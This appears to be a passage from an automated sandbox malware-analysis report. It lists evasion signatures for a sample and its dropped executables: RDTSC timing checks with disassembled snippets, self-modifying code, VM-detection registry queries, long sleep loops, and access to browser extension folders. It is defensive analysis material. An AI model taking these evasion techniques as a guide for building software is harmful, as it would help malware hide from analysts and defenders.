Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9009B second address: 4C900AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C900AB second address: 4C900AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40056 second address: 4C40065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40065 second address: 4C4006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4006B second address: 4C4006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4006F second address: 4C4007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4007D second address: 4C400AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBC91259406h 0x0000000a sbb eax, 371FAAA8h 0x00000010 jmp 00007FBC912593FBh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C400AB second address: 4C40142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 mov di, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007FBC9118B8AEh 0x0000001d xchg eax, ecx 0x0000001e jmp 00007FBC9118B8B0h 0x00000023 push eax 0x00000024 jmp 00007FBC9118B8ABh 0x00000029 xchg eax, ecx 0x0000002a pushad 0x0000002b mov al, C4h 0x0000002d push ebx 0x0000002e mov esi, 56E047F3h 0x00000033 pop esi 0x00000034 popad 0x00000035 push ebx 0x00000036 pushad 0x00000037 mov ecx, 34E03261h 0x0000003c call 00007FBC9118B8AEh 0x00000041 pushfd 0x00000042 jmp 00007FBC9118B8B2h 0x00000047 add cx, 9428h 0x0000004c jmp 00007FBC9118B8ABh 0x00000051 popfd 0x00000052 pop eax 0x00000053 popad 0x00000054 mov dword ptr [esp], ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c mov ax, 26EDh 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40142 second address: 4C4015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259406h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4015C second address: 4C401B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007FBC9118B8B7h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FBC9118B8B6h 0x00000016 push eax 0x00000017 jmp 00007FBC9118B8ABh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBC9118B8B5h 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401B9 second address: 4C401BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401BF second address: 4C401C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401C3 second address: 4C401C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401C7 second address: 4C401E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBC9118B8B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401E6 second address: 4C401F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401F8 second address: 4C40229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FBC9118B8ACh 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBC9118B8B7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40229 second address: 4C402A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBC912593FFh 0x00000009 or ch, 0000005Eh 0x0000000c jmp 00007FBC91259409h 0x00000011 popfd 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test esi, esi 0x00000019 jmp 00007FBC912593FAh 0x0000001e je 00007FBD035377A1h 0x00000024 jmp 00007FBC91259400h 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 jmp 00007FBC91259400h 0x00000035 je 00007FBD0353778Ah 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402A3 second address: 4C402A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402A9 second address: 4C402CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402CA second address: 4C402CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402CE second address: 4C402D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402D2 second address: 4C402D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402D8 second address: 4C4039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 call 00007FBC91259408h 0x00000016 pushfd 0x00000017 jmp 00007FBC91259402h 0x0000001c xor si, 4308h 0x00000021 jmp 00007FBC912593FBh 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f pushad 0x00000030 mov esi, edx 0x00000032 pushad 0x00000033 mov ecx, ebx 0x00000035 popad 0x00000036 popad 0x00000037 jne 00007FBD0353773Ah 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FBC91259402h 0x00000044 and ecx, 44077898h 0x0000004a jmp 00007FBC912593FBh 0x0000004f popfd 0x00000050 pushad 0x00000051 movzx esi, dx 0x00000054 call 00007FBC912593FBh 0x00000059 pop ecx 0x0000005a popad 0x0000005b popad 0x0000005c test byte ptr [esi+48h], 00000001h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FBC91259402h 0x00000067 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4039A second address: 4C4039F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30791 second address: 4C30797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30797 second address: 4C3079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C3079B second address: 4C30809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FBC912593FEh 0x0000000f and esp, FFFFFFF8h 0x00000012 jmp 00007FBC91259400h 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FBC91259400h 0x0000001d push eax 0x0000001e jmp 00007FBC912593FBh 0x00000023 xchg eax, ebx 0x00000024 jmp 00007FBC91259406h 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBC912593FAh 0x00000033 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 3AEAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 3AEBB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 57ABB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 55AC8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 5DD5A8 instructions caused by: Self-modifying code
Source: C:\Users\userAAKKKEBFCG.exe Special instruction interceptor: First address: 8ED26 instructions caused by: Self-modifying code
Source: C:\Users\userAAKKKEBFCG.exe Special instruction interceptor: First address: 24FEE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 60EAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 60EBB9 instructions caused by: Self-modifying code
Source: C:\Users\userAAKKKEBFCG.exe Special instruction interceptor: First address: 2D0A3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 7DABB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 7BAC8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 83D5A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 43ED26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 5FFEE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 680A3D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Code function: 5_2_04CB0100 rdtsc 5_2_04CB0100
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1054
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 437
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1321
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 991
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1075
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 380
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1940
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 1017
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 907
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 495
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 370
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 1224
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 431
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 7.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7684 Thread sleep count: 1054 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7684 Thread sleep time: -2109054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7708 Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7708 Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7656 Thread sleep count: 437 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7656 Thread sleep time: -13110000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7692 Thread sleep count: 1321 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7692 Thread sleep time: -2643321s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7688 Thread sleep count: 991 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7688 Thread sleep time: -1982991s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep count: 1075 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep time: -2151075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7800 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7800 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7804 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7804 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7808 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7808 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep count: 380 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep time: -11400000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7912 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep count: 1940 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep time: -3881940s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 1224 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 431 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 145 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 216 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 108 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread sleep count: Count: 1224 delay: -10
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
